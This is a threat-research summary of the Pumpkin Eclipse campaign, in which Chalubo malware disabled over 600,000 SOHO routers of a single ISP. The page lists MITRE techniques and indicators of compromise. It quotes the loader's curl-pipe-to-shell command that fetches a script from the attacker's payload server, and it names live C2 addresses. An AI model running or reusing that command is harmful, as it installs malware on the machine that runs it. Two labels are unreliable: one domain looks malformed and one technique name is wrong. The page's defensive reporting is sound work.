Threat Research

The Pumpkin Eclipse – Lumen

Securonix

Black Lotus Labs documented a destructive campaign that offline more than 600,000 SOHO/IoT routers from a single ISP using Chalubo, a commodity RAT, delivered via a firmware-like update. The operation leveraged multi-stage loaders, Lua scripting, and ChaCha20-encrypted C2 communications to target Sagemcom and ActionTec modems within one ASN. #Chalubo #BlackLotusLabs #Sagemcom #ActionTec

Keypoints

  • Destructive campaign: over 600k SOHO/IoT routers were rendered inoperable and required hardware replacement within a 72-hour window (Oct 25–27, 2023).
  • Primary payload: Chalubo, a commodity remote access trojan, identified as the driver behind the outage, capable of in-memory execution and encrypted C2 communications.
  • Infection chain: multi-stage loader with first-stage bash script (get_scrpc) downloaded from payload servers, followed by additional stages and payloads.
  • Loader behavior: uses Bash scripts, checks for binaries (usb2rci), configures iptables, and orchestrates retrieval and execution of the Chalubo agent; includes a 30-minute delay to evade sandbox detection.
  • Malware capabilities: Lua script execution for commands, ChaCha20-based C2 encryption, and hardcoded C2 lists with per-architecture payloads; potential DDoS-related functionality.
  • Global telemetry: Chalubo activity extended into Nov 2023–early 2024 with hundreds of thousands of IPs contacting C2s; majority of bots connected to a single panel, suggesting attribution obfuscation.
  • Scope and impact: attack appears engineered to disrupt service (firmware-level compromise) rather than maximize data theft; limited to a specific ASN, affecting two modem models.

MITRE Techniques

  • [T1059.008] Lua – The malware runs Lua scripts and uses Lua to retrieve additional payloads from C2s. Quote: “the operators behind this bot could execute any Lua script sent to the bot.”
  • [T1027] Obfuscated/Compressed Files and Information – The threat “removed all files from disk to run in-memory” and used obfuscation tradecraft. Quote: “employed savvy tradecraft to obfuscate its activity; it removed all files from disk to run in-memory.”
  • [T1036] Masquerading – The malware renames the process to hamper detection. Quote: “Renaming the process once run on the impacted system to hamper detection.”
  • [T1059.004] Unix Shell – Initial loader uses Unix shell commands to fetch and execute scripts. Quote: “curl http://104.233.210[.]119:51248/get_scrpc | /bin/sh”.
  • [T1105] Ingress Tool Transfer – The first-stage payload is retrieved from a payload server (get_scrpc) as the first step in infection. Quote: “Once exploited, devices reach out to a first stage payload server and retrieve the ‘get_scrpc’ bash script, the first step in the infection process.”
  • [T1573.001] Encrypted Channel – C2 communications are ChaCha20-encrypted with a hardcoded key/nonce. Quote: “downloads and decrypts the second stage using ChaCha20 with a hardcoded key and nonce.”
  • [T1082] System Information Discovery – The malware collects host-based information (MAC, device ID/type/version, local IP). Quote: “the malware ran, it attempted to retrieve host-based information such as the MAC address, device ID, device type, device version and the local IP.”
  • [T1071.001] Web Protocols – C2 communications occur over HTTP(S); the C2 infrastructure includes domain/IP-based HTTP requests. (Quoted references to C2 domain/IP and HTTP-based communication exist in the article.)
  • [T1070.004] File Deletion – The binary deletes itself after execution to hinder analysis. Quote: “deletes itself from disk.”
  • [T1057] Process Creation – The loader forks, renames, and uses PR_SET_NAME to mask the running process and avoid detection. Quote: “the process name to a random creation of the same length as the original process name by using prctl PR_SET_NAME.”

Indicators of Compromise

  • [Domain] C2 and payload delivery domain – coreconfig.net8080/E2XRIEGSOAPU3Z5Q8
  • [IP Address] 185.189.240.13 – hardcoded fallback C2/command domain
  • [IP Address] 104.233.210.119 – payload server/C2 host
  • [URL] http://104.233.210.119:51248/get_scrpc – first-stage script delivery
  • [File] /usr/bin/usb2rci – binary checked by the loader
  • [File] /tmp/file.lck and /tmp/crrs – second-stage artifacts written to disk
  • [URL] coreconfig[.]net8080/E2XRIEGSOAPU3Z5Q8 – (alternate representation of domain) used in C2 communications

Read more: https://blog.lumen.com/the-pumpkin-eclipse/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint